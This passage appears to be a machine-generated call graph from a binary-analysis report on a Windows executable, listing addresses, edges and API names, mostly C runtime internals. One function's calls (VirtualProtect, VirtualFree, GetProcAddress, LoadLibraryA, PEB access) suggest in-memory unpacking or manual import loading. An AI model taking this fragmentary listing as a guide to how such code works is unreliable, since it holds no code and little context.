d13d10 41 API calls 11907->11908 11909 d13225 11908->11909 11910 d13d10 41 API calls 11909->11910 11911 d13239 11910->11911 11912 d13d10 41 API calls 11911->11912 11913 d1324a 11912->11913 11914 d13d10 41 API calls 11913->11914 11915 d13288 11914->11915 11916 d13d10 41 API calls 11915->11916 11917 d132a5 11916->11917 11918 d13cf0 39 API calls 11917->11918 11919 d132c6 11918->11919 11920 d13cf0 39 API calls 11919->11920 11922 d132d5 11920->11922 11921 d13d10 41 API calls 11923 d13353 11921->11923 11922->11921 11924 d13d10 41 API calls 11923->11924 11925 d13373 11924->11925 11926 d13cf0 39 API calls 11925->11926 11927 d1339d 11926->11927 11928 d13cf0 39 API calls 11927->11928 11930 d133ac 11928->11930 11929 d13d10 41 API calls 11931 d133dd 11929->11931 11930->11929 11932 d13cf0 39 API calls 11931->11932 11933 d133f2 11932->11933 11934 d13cf0 39 API calls 11933->11934 11935 d133fe 11934->11935 11936 d13cf0 39 API calls 11935->11936 11937 d1340d 11936->11937 11938 d14766 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11937->11938 11939 d13425 11938->11939 11940 d13cf0 11939->11940 12365 d13df0 11940->12365 11942 d13cff 11942->11781 11944 d13cf0 39 API calls 11943->11944 11945 d13452 11944->11945 11946 d13cf0 39 API calls 11945->11946 11947 d1345a 11946->11947 11948 d13cf0 39 API calls 11947->11948 11949 d13462 11948->11949 11949->11790 11951 d13d10 41 API calls 11950->11951 11952 d134b9 11951->11952 11953 d13d10 41 API calls 11952->11953 11954 d13509 11953->11954 11955 d13d10 41 API calls 11954->11955 11956 d13526 11955->11956 11957 d13cf0 39 API calls 11956->11957 11958 d13547 11957->11958 11959 d13cf0 39 API calls 11958->11959 11961 d13556 11959->11961 11960 d13d10 41 API calls 11962 d1358a 11960->11962 11961->11960 11963 d13d10 41 API calls 11962->11963 11964 d135a7 11963->11964 11965 d13cf0 39 API calls 11964->11965 11966 d135c8 11965->11966 11967 d13cf0 39 API calls 11966->11967 11969 d135d7 11967->11969 11968 d13cf0 39 API calls 11970 d1362e 11968->11970 11969->11968 11971 d13cf0 39 API calls 11970->11971 11972 d1363d 11971->11972 11973 d14766 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11972->11973 11974 d13655 11973->11974 11974->11794 11976 d13cf0 39 API calls 11975->11976 11977 d13678 11976->11977 11977->11798 11979 d13cf0 39 API calls 11978->11979 11980 d12aaf 11979->11980 11981 d12ac0 11980->11981 11982 d13d10 41 API calls 11981->11982 11983 d12aff 11982->11983 11984 d13d10 41 API calls 11983->11984 11985 d12b13 11984->11985 11986 d13d10 41 API calls 11985->11986 11987 d12b24 11986->11987 11988 d13cf0 39 API calls 11987->11988 11989 d12b69 11988->11989 11990 d13cf0 39 API calls 11989->11990 11991 d12b75 11990->11991 11992 d13cf0 39 API calls 11991->11992 11993 d12b84 11992->11993 11994 d14766 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11993->11994 11995 d12b9c 11994->11995 11996 d12ba0 11995->11996 11997 d13d10 41 API calls 11996->11997 11998 d12be2 11997->11998 11999 d13d10 41 API calls 11998->11999 12000 d12bf6 11999->12000 12001 d13d10 41 API calls 12000->12001 12002 d12c31 12001->12002 12003 d13d10 41 API calls 12002->12003 12004 d12c4e 12003->12004 12005 d13cf0 39 API calls 12004->12005 12006 d12c6f 12005->12006 12007 d13cf0 39 API calls 12006->12007 12009 d12c7e 12007->12009 12008 d13cf0 39 API calls 12010 d12cbb 12008->12010 12009->12008 12011 d13cf0 39 API calls 12010->12011 12012 d12cca 12011->12012 12013 d14766 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12012->12013 12014 d12ce2 12013->12014 12015 d12cf0 12014->12015 12016 d13d10 41 API calls 12015->12016 12017 d12d0d 12016->12017 12017->11808 12019 d13d10 41 API calls 12018->12019 12020 d12d5f 12019->12020 12021 d13cf0 39 API calls 12020->12021 12022 d12db0 12021->12022 12023 d13cf0 39 API calls 12022->12023 12024 d12dbc 12023->12024 12025 d13cf0 39 API calls 12024->12025 12026 d12dc8 12025->12026 12027 d13cf0 39 API calls 12026->12027 12028 d12dd7 12027->12028 12029 d14766 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12028->12029 12030 d12df0 12029->12030 12030->11818 12032 d12e2b 12031->12032 12033 d13cf0 39 API calls 12032->12033 12034 d12ea1 12033->12034 12035 d13cf0 39 API calls 12034->12035 12036 d12ea9 12035->12036 12037 d12ec0 12036->12037 12038 d13d10 41 API calls 12037->12038 12040 d12eff 12038->12040 12039 d13d10 41 API calls 12041 d12f6d 12039->12041 12040->12039 12042 d13d10 41 API calls 12041->12042 12043 d12f8a 12042->12043 12044 d13cf0 39 API calls 12043->12044 12045 d12fab 12044->12045 12046 d13cf0 39 API calls 12045->12046 12048 d12fba 12046->12048 12047 d13d10 41 API calls 12049 d12fee 12047->12049 12048->12047 12050 d13d10 41 API calls 12049->12050 12051 d1300b 12050->12051 12052 d13cf0 39 API calls 12051->12052 12053 d1302c 12052->12053 12054 d13cf0 39 API calls 12053->12054 12055 d1303b 12054->12055 12056 d13cf0 39 API calls 12055->12056 12057 d1309b 12056->12057 12058 d14766 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12057->12058 12059 d130b3 12058->12059 12059->11826 12061 d13d10 41 API calls 12060->12061 12062 d11c2c 12061->12062 12063 d13d10 41 API calls 12062->12063 12064 d11c76 12063->12064 12065 d13d10 41 API calls 12064->12065 12066 d11c8a 12065->12066 12067 d13d10 41 API calls 12066->12067 12068 d11ca7 12067->12068 12069 d13cf0 39 API calls 12068->12069 12070 d11cc8 12069->12070 12071 d13cf0 39 API calls 12070->12071 12072 d11cd7 12071->12072 12073 d13cf0 39 API calls 12072->12073 12074 d11d9b 12073->12074 12075 d13cf0 39 API calls 12074->12075 12076 d11da7 12075->12076 12077 d13cf0 39 API calls 12076->12077 12078 d11db3 12077->12078 12079 d13cf0 39 API calls 12078->12079 12080 d11dc2 12079->12080 12081 d14766 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12080->12081 12082 d11dd8 12081->12082 12082->11832 12084 d13d10 41 API calls 12083->12084 12085 d11e36 12084->12085 12086 d13d10 41 API calls 12085->12086 12087 d11e4a 12086->12087 12088 d13d10 41 API calls 12087->12088 12089 d11e67 12088->12089 12090 d13cf0 39 API calls 12089->12090 12091 d11e88 12090->12091 12092 d13cf0 39 API calls 12091->12092 12094 d11e97 12092->12094 12093 d13d10 41 API calls 12095 d11f0b 12093->12095 12094->12093 12096 d13d10 41 API calls 12095->12096 12097 d11f28 12096->12097 12098 d13cf0 39 API calls 12097->12098 12099 d11f49 12098->12099 12100 d13cf0 39 API calls 12099->12100 12102 d11f58 12100->12102 12101 d13cf0 39 API calls 12103 d11faf 12101->12103 12102->12101 12104 d13cf0 39 API calls 12103->12104 12105 d11fbb 12104->12105 12106 d13cf0 39 API calls 12105->12106 12107 d11fca 12106->12107 12108 d14766 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12107->12108 12109 d11fe2 12108->12109 12110 d11ff0 12109->12110 12111 d13d10 41 API calls 12110->12111 12112 d1202b 12111->12112 12113 d13d10 41 API calls 12112->12113 12114 d12042 12113->12114 12115 d13d10 41 API calls 12114->12115 12116 d1205c 12115->12116 12117 d13cf0 39 API calls 12116->12117 12118 d1207a 12117->12118 12119 d13cf0 39 API calls 12118->12119 12121 d12089 12119->12121 12120 d13d10 41 API calls 12122 d120bd 12120->12122 12121->12120 12123 d13d10 41 API calls 12122->12123 12124 d120da 12123->12124 12125 d13cf0 39 API calls 12124->12125 12126 d120fb 12125->12126 12127 d13cf0 39 API calls 12126->12127 12129 d1210a 12127->12129 12128 d13d10 41 API calls 12130 d1213e 12128->12130 12129->12128 12131 d13d10 41 API calls 12130->12131 12132 d1215b 12131->12132 12133 d13cf0 39 API calls 12132->12133 12134 d1217c 12133->12134 12135 d13cf0 39 API calls 12134->12135 12137 d1218b 12135->12137 12136 d13cf0 39 API calls 12138 d121be 12136->12138 12137->12136 12139 d14766 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12138->12139 12140 d121d4 12139->12140 12141 d121e0 12140->12141 12142 d13d10 41 API calls 12141->12142 12143 d12230 12142->12143 12144 d13d10 41 API calls 12143->12144 12145 d12270 12144->12145 12146 d13d10 41 API calls 12145->12146 12147 d12284 12146->12147 12148 d13d10 41 API calls 12147->12148 12149 d122a1 12148->12149 12150 d13cf0 39 API calls 12149->12150 12151 d122c2 12150->12151 12152 d13cf0 39 API calls 12151->12152 12154 d122d1 12152->12154 12153 d13d10 41 API calls 12155 d12305 12153->12155 12154->12153 12156 d13d10 41 API calls 12155->12156 12157 d12322 12156->12157 12158 d13cf0 39 API calls 12157->12158 12159 d12343 12158->12159 12160 d13cf0 39 API calls 12159->12160 12162 d12352 12160->12162 12161 d13cf0 39 API calls 12163 d123d3 12161->12163 12162->12161 12164 d13cf0 39 API calls 12163->12164 12165 d123e2 12164->12165 12166 d14766 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12165->12166 12167 d123fa 12166->12167 12168 d12400 12167->12168 12169 d13d10 41 API calls 12168->12169 12170 d12448 12169->12170 12171 d13d10 41 API calls 12170->12171 12172 d1246c 12171->12172 12173 d13d10 41 API calls 12172->12173 12174 d1248a 12173->12174 12175 d13d10 41 API calls 12174->12175 12176 d1249b 12175->12176 12177 d13d10 41 API calls 12176->12177 12179 d124ac 12177->12179 12178 d13d10 41 API calls 12180 d124ec 12178->12180 12179->12178 12181 d13d10 41 API calls 12180->12181 12182 d12512 12181->12182 12183 d13cf0 39 API calls 12182->12183 12184 d1253f 12183->12184 12185 d13cf0 39 API calls 12184->12185 12187 d1254e 12185->12187 12186 d13d10 41 API calls 12188 d12591 12186->12188 12187->12186 12189 d13d10 41 API calls 12188->12189 12190 d125b7 12189->12190 12191 d13cf0 39 API calls 12190->12191 12192 d125e4 12191->12192 12193 d13cf0 39 API calls 12192->12193 12195 d125f3 12193->12195 12194 d13d10 41 API calls 12196 d12636 12194->12196 12195->12194 12197 d13d10 41 API calls 12196->12197 12198 d1265c 12197->12198 12199 d13cf0 39 API calls 12198->12199 12200 d12689 12199->12200 12201 d13cf0 39 API calls 12200->12201 12203 d12698 12201->12203 12202 d13d10 41 API calls 12204 d126db 12202->12204 12203->12202 12205 d13d10 41 API calls 12204->12205 12206 d12701 12205->12206 12207 d13cf0 39 API calls 12206->12207 12208 d1272e 12207->12208 12209 d13cf0 39 API calls 12208->12209 12211 d1273d 12209->12211 12210 d13d10 41 API calls 12212 d1277d 12210->12212 12211->12210 12213 d13cf0 39 API calls 12212->12213 12214 d12798 12213->12214 12215 d13cf0 39 API calls 12214->12215 12216 d127a4 12215->12216 12217 d13cf0 39 API calls 12216->12217 12218 d127b3 12217->12218 12219 d13cf0 39 API calls 12218->12219 12220 d127bf 12219->12220 12221 d13cf0 39 API calls 12220->12221 12222 d127ce 12221->12222 12223 d14766 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12222->12223 12224 d127e6 12223->12224 12224->11844 12226 d13cf0 39 API calls 12225->12226 12227 d1281a 12226->12227 12227->11850 12229 d128a6 12228->12229 12230 d13d10 41 API calls 12229->12230 12231 d12934 12230->12231 12232 d13cf0 39 API calls 12231->12232 12233 d12949 12232->12233 12234 d13cf0 39 API calls 12233->12234 12235 d12958 12234->12235 12235->11856 12237 d13d10 41 API calls 12236->12237 12238 d129a8 12237->12238 12239 d13d10 41 API calls 12238->12239 12240 d129d0 12239->12240 12241 d13d10 41 API calls 12240->12241 12243 d129e1 12241->12243 12242 d13cf0 39 API calls 12244 d12a5b 12242->12244 12243->12242 12245 d13cf0 39 API calls 12244->12245 12246 d12a67 12245->12246 12247 d13cf0 39 API calls 12246->12247 12248 d12a76 12247->12248 12249 d14766 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12248->12249 12250 d12a8e LPtoDP 12249->12250 12250->11663 12250->11664 12264 d14340 12251->12264 12255 d140fb 12256 d14340 5 API calls 12255->12256 12263 d14125 12255->12263 12257 d14179 12256->12257 12271 d14290 12257->12271 12261 d14766 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12262 d136cd 12261->12262 12262->11774 12263->12261 12265 d1435b _Min_value _Max_value 12264->12265 12266 d14766 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12265->12266 12267 d140f1 12266->12267 12267->12255 12268 d11bc0 12267->12268 12278 d14746 12268->12278 12272 d142b1 _Max_value 12271->12272 12273 d14766 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12272->12273 12274 d14185 12273->12274 12275 d14450 12274->12275 12321 d14560 12275->12321 12283 d146ce 12278->12283 12282 d14765 12289 d1467e 12283->12289 12286 d15ab0 12287 d15af7 RaiseException 12286->12287 12288 d15aca 12286->12288 12287->12282 12288->12287 12292 d15870 12289->12292 12293 d1587d 12292->12293 12299 d146aa 12292->12299 12293->12299 12300 d17ae8 12293->12300 12296 d158aa 12318 d17760 12296->12318 12299->12286 12301 d19565 12300->12301 12302 d195a3 12301->12302 12303 d1958e HeapAlloc 12301->12303 12307 d19577 _unexpected 12301->12307 12304 d1980a ___free_lconv_mon 14 API calls 12302->12304 12305 d195a1 12303->12305 12303->12307 12306 d1589a 12304->12306 12305->12306 12306->12296 12309 d18d83 12306->12309 12307->12302 12307->12303 12308 d17b1d _unexpected EnterCriticalSection LeaveCriticalSection 12307->12308 12308->12307 12310 d18d91 12309->12310 12311 d18d9f 12309->12311 12310->12311 12316 d18db7 12310->12316 12312 d1980a ___free_lconv_mon 14 API calls 12311->12312 12313 d18da7 12312->12313 12315 d17a87 CallUnexpected 39 API calls 12313->12315 12314 d18db1 12314->12296 12315->12314 12316->12314 12317 d1980a ___free_lconv_mon 14 API calls 12316->12317 12317->12313 12319 d18f02 ___free_lconv_mon 14 API calls 12318->12319 12320 d17778 12319->12320 12320->12299 12324 d14580 12321->12324 12325 d14590 allocator 12324->12325 12328 d145b0 12325->12328 12329 d145bd 12328->12329 12334 d14475 12328->12334 12330 d145d4 12329->12330 12331 d145c6 12329->12331 12343 d11b10 12330->12343 12335 d14600 12331->12335 12334->12263 12336 d14617 12335->12336 12337 d1461c 12335->12337 12346 d11a80 12336->12346 12338 d11b10 allocator 16 API calls 12337->12338 12341 d14626 12338->12341 12342 d14642 12341->12342 12350 d17a97 12341->12350 12342->12334 12355 d14774 12343->12355 12347 d11a8e stdext::threads::lock_error::lock_error 12346->12347 12348 d15ab0 CallUnexpected RaiseException 12347->12348 12349 d11a9c 12348->12349 12349->12337 12351 d179d3 CallUnexpected 39 API calls 12350->12351 12352 d17aa6 12351->12352 12353 d17ab4 allocator 11 API calls 12352->12353 12354 d17ab3 12353->12354 12358 d14779 12355->12358 12356 d17ae8 ___std_exception_copy 15 API calls 12356->12358 12357 d11b1c 12357->12334 12358->12356 12358->12357 12359 d17b1d _unexpected EnterCriticalSection LeaveCriticalSection 12358->12359 12361 d14795 allocator 12358->12361 12359->12358 12360 d14b5f stdext::threads::lock_error::lock_error 12362 d15ab0 CallUnexpected RaiseException 12360->12362 12361->12360 12364 d15ab0 CallUnexpected RaiseException 12361->12364 12363 d14b7c 12362->12363 12364->12360 12366 d13e07 12365->12366 12368 d13e38 12366->12368 12369 d13f10 12366->12369 12368->11942 12372 d14010 12369->12372 12375 d14230 12372->12375 12374 d13f45 12374->12368 12376 d14268 _MallocaArrayHolder 12375->12376 12377 d1425b 12375->12377 12376->12374 12379 d11b30 12377->12379 12381 d11b6e 12379->12381 12380 d17a97 allocator 39 API calls 12380->12381 12381->12380 12382 d11b8a 12381->12382 12382->12376 12384 d11132 12383->12384 12385 d1115a GetModuleHandleW 12384->12385 12386 d1117f 12385->12386 12387 d17ae8 ___std_exception_copy 15 API calls 12386->12387 12388 d111ad __InternalCxxFrameHandler 12386->12388 12387->12388 12388->11862 12397 d11359 __InternalCxxFrameHandler 12389->12397 12398 d11352 12389->12398 12390 d14766 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12391 d116b4 GetPEB GetUserDefaultLCID 12390->12391 12391->11874 12392 d114ef 12393 d11508 VirtualProtect 12392->12393 12394 d1152b 12393->12394 12396 d11574 VirtualFree 12394->12396 12394->12398 12400 d11595 VirtualProtect 12394->12400 12395 d1142f GetModuleHandleA GetProcAddress LoadLibraryA 12395->12397 12396->12394 12397->12392 12397->12395 12399 d114d5 GetProcAddress 12397->12399 12398->12390 12399->12397 12400->12398 12402->11883 12404 d19290 12403->12404 12408 d19296 12403->12408 12448 d1b728 12404->12448 12427 d1929a SetLastError 12408->12427 12453 d1b767 12408->12453 12411 d18d14 12430 d18d3f 12411->12430 12412 d1932f 12414 d18d3f CallUnexpected 37 API calls 12412->12414 12418 d19334 12414->12418 12415 d192e0 12417 d1b767 _unexpected 6 API calls 12415->12417 12416 d192cf 12419 d1b767 _unexpected 6 API calls 12416->12419 12421 d192ec 12417->12421 12420 d192dd 12419->12420 12465 d18f02 12420->12465 12422 d192f0 12421->12422 12423 d19307 12421->12423 12424 d1b767 _unexpected 6 API calls 12422->12424 12471 d190a8 12423->12471 12424->12420 12427->12411 12427->12412 12429 d18f02 ___free_lconv_mon 14 API calls 12429->12427 12672 d1babf 12430->12672 12433 d18d4f 12434 d18d59 IsProcessorFeaturePresent 12433->12434 12439 d18d78 12433->12439 12436 d18d65 12434->12436 12702 d1788b 12436->12702 12437 d18658 CallUnexpected 21 API calls 12441 d18d82 12437->12441 12439->12437 12440 d18d9f 12442 d1980a ___free_lconv_mon 14 API calls 12440->12442 12441->12440 12446 d18db7 12441->12446 12443 d18da7 12442->12443 12708 d17a87 12443->12708 12444 d18d3e 12446->12444 12447 d1980a ___free_lconv_mon 14 API calls 12446->12447 12447->12443 12476 d1b5e5 12448->12476 12450 d1b744 12451 d1b74d 12450->12451 12452 d1b75f TlsGetValue 12450->12452 12451->12408 12454 d1b5e5 _unexpected 5 API calls 12453->12454 12455 d1b783 12454->12455 12456 d1b7a1 TlsSetValue 12455->12456 12457 d192b2 12455->12457 12457->12427 12458 d1981d 12457->12458 12463 d1982a _unexpected 12458->12463 12459 d1986a 12493 d1980a 12459->12493 12460 d19855 HeapAlloc 12461 d192c7 12460->12461 12460->12463 12461->12415 12461->12416 12463->12459 12463->12460 12490 d17b1d 12463->12490 12466 d18f37 12465->12466 12467 d18f0d HeapFree 12465->12467 12466->12427 12467->12466 12468 d18f22 GetLastError 12467->12468 12469 d18f2f ___free_lconv_mon 12468->12469 12470 d1980a ___free_lconv_mon 12 API calls 12469->12470 12470->12466 12530 d18f3c 12471->12530 12477 d1b615 12476->12477 12481 d1b611 _unexpected 12476->12481 12477->12481 12482 d1b51a 12477->12482 12480 d1b62f GetProcAddress 12480->12481 12481->12450 12484 d1b52b ___vcrt_InitializeCriticalSectionEx 12482->12484 12483 d1b5c1 12483->12480 12483->12481 12484->12483 12485 d1b549 LoadLibraryExW 12484->12485 12489 d1b597 LoadLibraryExW 12484->12489 12486 d1b564 GetLastError 12485->12486 12487 d1b5c8 12485->12487 12486->12484 12487->12483 12488 d1b5da FreeLibrary 12487->12488 12488->12483 12489->12484 12489->12487 12496 d17b49 12490->12496 12507 d193cb GetLastError 12493->12507 12495 d1980f 12495->12461 12497 d17b55 ___scrt_is_nonwritable_in_current_image 12496->12497 12502 d195f4 EnterCriticalSection 12497->12502 12499 d17b60 CallUnexpected 12503 d17b97 12499->12503 12502->12499 12506 d1963c LeaveCriticalSection 12503->12506 12505 d17b28 12505->12463 12506->12505 12508 d193e1 12507->12508 12509 d193e7 12507->12509 12510 d1b728 _unexpected 6 API calls 12508->12510 12511 d1b767 _unexpected 6 API calls 12509->12511 12513 d193eb SetLastError 12509->12513 12510->12509 12512 d19403 12511->12512 12512->12513 12515 d1981d _unexpected 12 API calls 12512->12515 12513->12495 12516 d19418 12515->12516 12517 d19431 12516->12517 12518 d19420 12516->12518 12519 d1b767 _unexpected 6 API calls 12517->12519 12520 d1b767 _unexpected 6 API calls 12518->12520 12521 d1943d 12519->12521 12522 d1942e 12520->12522 12523 d19441 12521->12523 12524 d19458 12521->12524 12526 d18f02 ___free_lconv_mon 12 API calls 12522->12526 12525 d1b767 _unexpected 6 API calls 12523->12525 12527 d190a8 _unexpected 12 API calls 12524->12527 12525->12522 12526->12513 12528 d19463 12527->12528 12529 d18f02 ___free_lconv_mon 12 API calls 12528->12529 12529->12513 12531 d18f48 ___scrt_is_nonwritable_in_current_image 12530->12531 12544 d195f4 EnterCriticalSection 12531->12544 12533 d18f52 12545 d18f82 12533->12545 12536 d1904e 12537 d1905a ___scrt_is_nonwritable_in_current_image 12536->12537 12549 d195f4 EnterCriticalSection 12537->12549 12539 d19064 12550 d1922f 12539->12550 12541 d1907c 12554 d1909c 12541->12554 12544->12533 12548 d1963c LeaveCriticalSection 12545->12548 12547 d18f70 12547->12536 12548->12547 12549->12539 12551 d1923e _unexpected 12550->12551 12553 d19265 _unexpected 12550->12553 12551->12553 12557 d1b1c9 12551->12557 12553->12541 12671 d1963c LeaveCriticalSection 12554->12671 12556 d1908a 12556->12429 12558 d1b249 12557->12558 12561 d1b1df 12557->12561 12560 d18f02 ___free_lconv_mon 14 API calls 12558->12560 12583 d1b297 12558->12583 12562 d1b26b 12560->12562 12561->12558 12563 d1b212 12561->12563 12567 d18f02 ___free_lconv_mon 14 API calls 12561->12567 12564 d18f02 ___free_lconv_mon 14 API calls 12562->12564 12569 d18f02 ___free_lconv_mon 14 API calls 12563->12569 12584 d1b234 12563->12584 12565 d1b27e 12564->12565 12568 d18f02 ___free_lconv_mon 14 API calls 12565->12568 12566 d18f02 ___free_lconv_mon 14 API calls 12570 d1b23e 12566->12570 12572 d1b207 12567->12572 12575 d1b28c 12568->12575 12576 d1b229 12569->12576 12577 d18f02 ___free_lconv_mon 14 API calls 12570->12577 12571 d1b305 12578 d18f02 ___free_lconv_mon 14 API calls 12571->12578 12585 d1ad6d 12572->12585 12573 d1b2a5 12573->12571 12581 d18f02 14 API calls ___free_lconv_mon 12573->12581 12579 d18f02 ___free_lconv_mon 14 API calls 12575->12579 12613 d1ae6b 12576->12613 12577->12558 12582 d1b30b 12578->12582 12579->12583 12581->12573 12582->12553 12625 d1b33a 12583->12625 12584->12566 12586 d1ad7e 12585->12586 12612 d1ae67 12585->12612 12587 d1ad8f 12586->12587 12588 d18f02 ___free_lconv_mon 14 API calls 12586->12588 12589 d1ada1 12587->12589 12590 d18f02 ___free_lconv_mon 14 API calls 12587->12590 12588->12587 12591 d1adb3 12589->12591 12592 d18f02 ___free_lconv_mon 14 API calls 12589->12592 12590->12589 12593 d1adc5 12591->12593 12594 d18f02 ___free_lconv_mon 14 API calls 12591->12594 12592->12591 12595 d1add7 12593->12595 12596 d18f02 ___free_lconv_mon 14 API calls 12593->12596 12594->12593 12597 d1ade9 12595->12597 12598 d18f02 ___free_lconv_mon 14 API calls 12595->12598 12596->12595 12599 d1adfb 12597->12599 12600 d18f02 ___free_lconv_mon 14 API calls 12597->12600 12598->12597 12601 d1ae0d 12599->12601 12602 d18f02 ___free_lconv_mon 14 API calls 12599->12602 12600->12599 12603 d1ae1f 12601->12603 12604 d18f02 ___free_lconv_mon 14 API calls 12601->12604 12602->12601 12605 d1ae31 12603->12605 12606 d18f02 ___free_lconv_mon 14 API calls 12603->12606 12604->12603 12607 d18f02 ___free_lconv_mon 14 API calls 12605->12607 12608 d1ae43 12605->12608 12606->12605 12607->12608 12609 d18f02 ___free_lconv_mon 14 API calls 12608->12609 12610 d1ae55 12608->12610 12609->12610 12611 d18f02 ___free_lconv_mon 14 API calls 12610->12611 12610->12612 12611->12612 12612->12563 12614 d1ae78 12613->12614 12624 d1aed0 12613->12624 12615 d1ae88 12614->12615 12616 d18f02 ___free_lconv_mon 14 API calls 12614->12616 12617 d1ae9a 12615->12617 12618 d18f02 ___free_lconv_mon 14 API calls 12615->12618 12616->12615 12619 d1aeac 12617->12619 12621 d18f02 ___free_lconv_mon 14 API calls 12617->12621 12618->12617 12620 d1aebe 12619->12620 12622 d18f02 ___free_lconv_mon 14 API calls 12619->12622 12623 d18f02 ___free_lconv_mon 14 API calls 12620->12623 12620->12624 12621->12619 12622->12620 12623->12624 12624->12584 12626 d1b347 12625->12626 12627 d1b366 12625->12627 12626->12627 12631 d1aef9 12626->12631 12627->12573 12630 d18f02 ___free_lconv_mon 14 API calls 12630->12627 12632 d1af0a 12631->12632 12666 d1afd7 12631->12666 12667 d1aed4 12632->12667 12635 d1aed4 _unexpected 14 API calls 12636 d1af1d 12635->12636 12637 d1aed4 _unexpected 14 API calls 12636->12637 12638 d1af28 12637->12638 12639 d1aed4 _unexpected 14 API calls 12638->12639 12640 d1af33 12639->12640 12641 d1aed4 _unexpected 14 API calls 12640->12641 12642 d1af41 12641->12642 12643 d18f02 ___free_lconv_mon 14 API calls 12642->12643 12644 d1af4c 12643->12644 12645 d18f02 ___free_lconv_mon 14 API calls 12644->12645 12646 d1af57 12645->12646 12647 d18f02 ___free_lconv_mon 14 API calls 12646->12647 12648 d1af62 12647->12648 12649 d1aed4 _unexpected 14 API calls 12648->12649 12650 d1af70 12649->12650 12651 d1aed4 _unexpected 14 API calls 12650->12651 12652 d1af7e 12651->12652 12653 d1aed4 _unexpected 14 API calls 12652->12653 12654 d1af8f 12653->12654 12655 d1aed4 _unexpected 14 API calls 12654->12655 12656 d1af9d 12655->12656 12657 d1aed4 _unexpected 14 API calls 12656->12657 12658 d1afab 12657->12658 12659 d18f02 ___free_lconv_mon 14 API calls 12658->12659 12660 d1afb6 12659->12660 12661 d18f02 ___free_lconv_mon 14 API calls 12660->12661 12662 d1afc1 12661->12662 12663 d18f02 ___free_lconv_mon 14 API calls 12662->12663 12664 d1afcc 12663->12664 12665 d18f02 ___free_lconv_mon 14 API calls 12664->12665 12665->12666 12666->12630 12669 d1aee6 12667->12669 12668 d1aef5 12668->12635 12669->12668 12670 d18f02 ___free_lconv_mon 14 API calls 12669->12670 12670->12669 12671->12556 12711 d1b9ed 12672->12711 12675 d1bb04 12679 d1bb10 ___scrt_is_nonwritable_in_current_image 12675->12679 12676 d1bb72 CallUnexpected 12685 d1bba8 CallUnexpected 12676->12685 12722 d195f4 EnterCriticalSection 12676->12722 12677 d193cb ___free_lconv_mon 14 API calls 12683 d1bb41 CallUnexpected 12677->12683 12678 d1bb60 12680 d1980a ___free_lconv_mon 14 API calls 12678->12680 12679->12676 12679->12677 12679->12678 12679->12683 12681 d1bb65 12680->12681 12684 d17a87 CallUnexpected 39 API calls 12681->12684 12683->12676 12683->12678 12691 d1bb4a 12683->12691 12684->12691 12687 d1bce2 12685->12687 12688 d1bbe5 12685->12688 12699 d1bc13 12685->12699 12690 d1bced 12687->12690 12727 d1963c LeaveCriticalSection 12687->12727 12694 d1927a _unexpected 39 API calls 12688->12694 12688->12699 12693 d18658 CallUnexpected 21 API calls 12690->12693 12691->12433 12695 d1bcf5 12693->12695 12697 d1bc08 12694->12697 12696 d1927a _unexpected 39 API calls 12700 d1bc68 12696->12700 12698 d1927a _unexpected 39 API calls 12697->12698 12698->12699 12723 d1bc8e 12699->12723 12700->12691 12701 d1927a _unexpected 39 API calls 12700->12701 12701->12691 12703 d178a7 CallUnexpected 12702->12703 12704 d178d3 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12703->12704 12706 d179a4 CallUnexpected 12704->12706 12705 d14766 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 12707 d179c2 12705->12707 12706->12705 12707->12439 12729 d179d3 12708->12729 12712 d1b9f9 ___scrt_is_nonwritable_in_current_image 12711->12712 12717 d195f4 EnterCriticalSection 12712->12717 12714 d1ba07 12718 d1ba49 12714->12718 12717->12714 12721 d1963c LeaveCriticalSection 12718->12721 12720 d18d44 12720->12433 12720->12675 12721->12720 12722->12685 12724 d1bc92 12723->12724 12725 d1bc5a 12723->12725 12728 d1963c LeaveCriticalSection 12724->12728 12725->12691 12725->12696 12725->12700 12727->12690 12728->12725 12730 d179e5 CallUnexpected 12729->12730 12735 d17a0a 12730->12735 12732 d179fd 12746 d177c3 12732->12746 12736 d17a21 12735->12736 12737 d17a1a 12735->12737 12742 d17a2f 12736->12742 12756 d177ff 12736->12756 12752 d17828 GetLastError 12737->12752 12740 d17a56 12740->12742 12759 d17ab4 IsProcessorFeaturePresent 12740->12759 12742->12732 12743 d17a86 12744 d179d3 CallUnexpected 39 API calls 12743->12744 12745 d17a93 12744->12745 12745->12732 12747 d177cf 12746->12747 12748 d177e6 12747->12748 12785 d1786e 12747->12785 12750 d177f9 12748->12750 12751 d1786e CallUnexpected 39 API calls 12748->12751 12750->12444 12751->12750 12753 d17841 12752->12753 12763 d1947c 12753->12763 12757 d17823 12756->12757 12758 d1780a GetLastError SetLastError 12756->12758 12757->12740 12758->12740 12760 d17ac0 12759->12760 12761 d1788b CallUnexpected 8 API calls 12760->12761 12762 d17ad5 GetCurrentProcess TerminateProcess 12761->12762 12762->12743 12764 d19495 12763->12764 12765 d1948f 12763->12765 12767 d1b767 _unexpected 6 API calls 12764->12767 12784 d17859 SetLastError 12764->12784 12766 d1b728 _unexpected 6 API calls 12765->12766 12766->12764 12768 d194af 12767->12768 12769 d1981d _unexpected 14 API calls 12768->12769 12768->12784 12770 d194bf 12769->12770 12771 d194c7 12770->12771 12772 d194dc 12770->12772 12773 d1b767 _unexpected 6 API calls 12771->12773 12774 d1b767 _unexpected 6 API calls 